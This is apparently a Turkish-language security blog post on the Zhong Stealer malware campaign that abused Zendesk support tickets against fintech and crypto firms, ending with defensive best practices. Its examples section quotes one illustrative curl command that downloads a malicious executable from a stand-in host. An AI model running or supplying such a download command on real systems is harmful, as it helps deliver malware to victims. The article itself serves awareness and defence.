Giriş:
Zhong Stealer adlı yeni bir kötü amaçlı yazılım, fintech ve kripto para sektörlerine yönelik önemli bir tehdit olarak ortaya çıkmıştır. Any.run araştırmacıları, bu malware’in 20-24 Aralık 2024 tarihleri arasında gerçekleşen bir phishing kampanyası sırasında keşfedildiğini bildirmiştir. Bu yazılım, müşteri destek platformları olan Zendesk’i kullanarak organizasyonlara sızmakta ve saldırganlar, müşteriler gibi davranarak sosyal mühendislik taktiklerini kullanmaktadır.
Teknik Açıklamalar:
Zhong Stealer, zararlı yazılımın en son örneklerinden biridir ve genellikle sahte e-postalar veya mesajlar yoluyla kurbanlarını hedef alır. Saldırganlar, ilk olarak Zendesk gibi müşteri destek platformları üzerinden kurbanların sistemlerine erişim sağlamakta ve bu süreçte sahte kimliklerle kendilerini müşteri olarak tanıtmaktadır. Bu süreç, genellikle sosyal mühendislik taktikleri kullanılarak yürütülmektedir. Müşterilere ait bilgilerin ele geçirilmesi ve daha sonra bu bilgilerin finansal kazanç amacıyla kullanılması hedeflenir.
Olası güvenlik riskleri arasında, kullanıcı bilgilerinin çalınması, sistemlerin güvenliğinin ihlali ve dolaylı olarak finansal kayıplar bulunmaktadır. Özellikle, kripto para işlemleri ve finansal hizmetler sunan firmalar, bu tür saldırılara karşı son derece savunmasızdır.
Örnekler:
Zhong Stealer, bir kurbanın bilgisayarına bulaştıktan sonra, şu tür komutları çalıştırabilmektedir:
! curl -o malicious_file.exe http://example.com/malware.exe
Bu örnek, zararlı bir dosyanın indirilmesi adına kullanılır. Saldırganlar, bu şekilde kendi malware’lerini kurbanın sistemine yükleyerek daha fazla yetki almayı hedefler.
Önlemler & En İyi Uygulamalar:
Zhong Stealer ve benzeri zararlı yazılımlara karşı etkili önlemler almak için, organizasyonların aşağıdaki en iyi uygulamaları göz önünde bulundurması gerekir:
1. Güçlü kimlik doğrulama yöntemleri kullanmak, örneğin iki faktörlü kimlik doğrulama.
2. Tüm çalışanlara sosyal mühendislik saldırılarına karşı eğitim vererek farkındalık artırmak.
3. Güncel güvenlik yazılımlarını kullanmak ve düzenli olarak sistem güncellemelerini gerçekleştirmek.
4. Potansiyel phishing e-postalarını ve şüpheli bağlantıları tespit etmek için güvenli e-posta geçiş filtreleri kullanmak.
5. Müşteri destek platformlarını ve diğer kurumsal araçları yapılandırarak sınırlı erişim sağlamak.
Sonuç & Özet:
Zhong Stealer, fintech ve kripto para sektörlerinde önemli bir tehlike oluşturmakta ve saldırganların sosyal mühendislik taktikleri kullanarak müşterilerin verilerine ulaşmalarına olanak tanımaktadır. Bu tür saldırılara karşı etkili bir güvenlik stratejisi geliştirmek ve alınacak önlemlerle bu tür tehditlerin etkilerini azaltmak, her sektörde faaliyet gösteren firmalar için kritik öneme sahiptir.
Kaynakça:
https://gbhackers.com/new-zhong-stealer-malware-exploit-zendesk/ [Collection]
About the Author
